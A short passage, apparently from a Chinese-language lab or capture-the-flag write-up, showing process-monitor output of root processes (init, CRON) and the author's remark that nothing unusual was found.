2024/07/01 13:07:42 CMD: UID=0     PID=1      | /sbin/init 
2024/07/01 13:08:01 CMD: UID=0     PID=12598  | 
2024/07/01 13:08:31 CMD: UID=0     PID=12599  | 
2024/07/01 13:09:01 CMD: UID=0     PID=12602  | /usr/sbin/CRON -f 
2024/07/01 13:09:01 CMD: UID=0     PID=12601  | /usr/sbin/CRON -f 

无异常，那可能就是有些限制访问？暂且这样吧。